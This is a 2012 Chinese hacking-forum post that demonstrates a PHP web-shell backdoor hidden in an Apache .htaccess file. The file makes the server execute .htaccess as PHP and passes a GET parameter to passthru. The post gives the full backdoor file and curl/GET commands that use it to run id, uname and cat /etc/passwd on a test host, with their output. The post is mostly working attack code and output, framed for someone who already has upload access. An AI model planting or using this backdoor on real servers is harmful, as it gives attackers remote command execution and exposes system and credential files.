切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
237 PHP后门 .htaccess[复制链接]
发表于 2012-8-26 20:40:05 | 显示全部楼层 |!read_mode!
RE :http://d.fuzzexp.org/?p=845#toc-e5889be5bbba-htaccess
http://www.cao.com/forum.php?mod=viewthread&tid=369&extra=page%3D1
解析为PHP
如果我们上上传的权限 吧.htaccess 上传到当前目录 那么…
  1. root@ubuntu:/var/www# cat .htaccess
  2. <Files ~ "^\.ht">
  3.     Order allow,deny
  4.     Allow from all
  5. </Files>
  6. AddType application/x-httpd-php .htaccess

  7. ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
  8. root@ubuntu:/var/www#
复制代码
UBUNTU1操作:
  1. root@Dis9Team:/tmp# curl http://5.5.5.3/.htaccess?c=id;pwd;ls;uname -a;

  2.     Order allow,deny
  3.     Allow from all

  4. AddType application/x-httpd-php .htaccess

  5. ###### SHELL ######
  6. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  7. ###### LLEHS ######
  8. /tmp
  9. Ghost-Phisher              keyring-Y8QdXP  orbit-root          pulse-PKdhtXMmr18n  virtual-root.TsJe3L
  10. ghost-phisher_1.3_all.deb  orbit-gdm       pulse-2L9K88eMlGn7  ssh-Hqkmohvj1305    vmware-root
  11. Linux Dis9Team 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 2011 i686 i686 i386 GNU/Linux
  12. root@Dis9Team:/tmp#
复制代码
查看文件
  1. root@Dis9Team:/tmp# GET http://5.5.5.3/.htaccess?c=cat /etc/passwd

  2.     Order allow,deny
  3.     Allow from all

  4. AddType application/x-httpd-php .htaccess

  5. ###### SHELL ######
  6. ###### LLEHS ######
  7. root:x:0:0:root:/root:/bin/bash
  8. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  9. bin:x:2:2:bin:/bin:/bin/sh
  10. sys:x:3:3:sys:/dev:/bin/sh
  11. sync:x:4:65534:sync:/bin:/bin/sync
  12. games:x:5:60:games:/usr/games:/bin/sh
  13. man:x:6:12:man:/var/cache/man:/bin/sh
  14. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  15. mail:x:8:8:mail:/var/mail:/bin/sh
  16. news:x:9:9:news:/var/spool/news:/bin/sh
  17. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  18. proxy:x:13:13:proxy:/bin:/bin/sh
  19. www-data:x:33:33:www-data:/var/www:/bin/sh
  20. backup:x:34:34:backup:/var/backups:/bin/sh
  21. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  22. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  23. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  24. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  25. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  26. syslog:x:101:103::/home/syslog:/bin/false
  27. messagebus:x:102:105::/var/run/dbus:/bin/false
  28. avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  29. avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  30. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  31. gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
  32. speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  33. kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  34. pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  35. rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
  36. hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  37. saned:x:112:121::/home/saned:/bin/false
  38. brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
  39. postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  40. smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  41. smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  42. vboxadd:x:999:1::/var/run/vboxadd:/bin/false
  43. sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
  44. root@Dis9Team:/tmp#
复制代码
这个.htaccess 文件的含义
  1. <Files ~ "^\.ht">
  2.     Order allow,deny
  3.     Allow from all
  4. </Files>
  5. AddType application/x-httpd-php .htaccess

  6. ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
复制代码

AddType application/x-httpd-php .htaccess .htaccess解析为PHP脚本

下面的是后门






操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-29 09:46

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部